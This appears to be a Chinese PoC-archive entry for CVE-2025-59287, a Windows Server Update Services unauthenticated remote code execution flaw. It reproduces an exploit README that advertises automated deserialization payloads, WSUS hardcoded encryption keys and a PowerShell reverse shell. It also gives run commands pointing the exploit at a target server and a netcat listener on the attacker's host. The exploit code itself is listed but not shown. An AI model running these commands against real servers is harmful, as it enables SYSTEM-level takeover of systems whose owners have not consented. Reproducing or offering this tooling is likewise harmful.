POC详情: 5d65583f20608faba62fd7f5da38274570bdcc49

来源
关联漏洞
标题: Microsoft Windows Server 代码问题漏洞 (CVE-2025-59287)
描述:Microsoft Windows Server是美国微软(Microsoft)公司的一套服务器操作系统。 Microsoft Windows Server存在代码问题漏洞,该漏洞源于攻击者利用该漏洞可以远程执行代码。
描述
It is an Working exploit of new CVE found in WSUS.
介绍
# CVE-2025-59287 WSUS RCE Exploit

Automated exploit for Windows Server Update Services (WSUS) unauthenticated remote code execution vulnerability.

## Vulnerability Details

- **CVE ID:** CVE-2025-59287
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network
- **Authentication:** None required
- **Impact:** Remote Code Execution as SYSTEM

## Features

✅ Fully automated payload generation  
✅ Auto-downloads ysoserial.NET dependency  
✅ Built-in reverse shell listener  
✅ Cross-platform support (Windows/Linux/Mac)  
✅ AES encryption with WSUS hardcoded keys  
✅ PowerShell reverse shell payload

## Requirements

pip install -r requirements.txt

### Python Dependencies

### .NET Runtime (Auto-detected)
- **Windows:** .NET Framework (built-in)
- **Linux/Mac:** Wine or Mono
Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete


## Installation

Clone or download exploit files

cd CVE-2025-59287-exploit

Run exploit (auto-downloads ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444


## Usage

### Basic Exploitation

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

### if want session on another listener

Terminal 1: Start netcat listener

nc -lvnp 4444

Terminal 2: Run exploit without built-in listener

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

文件快照

[4.0K] /data/pocs/5d65583f20608faba62fd7f5da38274570bdcc49 ├── [ 12K] CVE-2025-59287.py ├── [1.4K] README.md └── [ 56] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。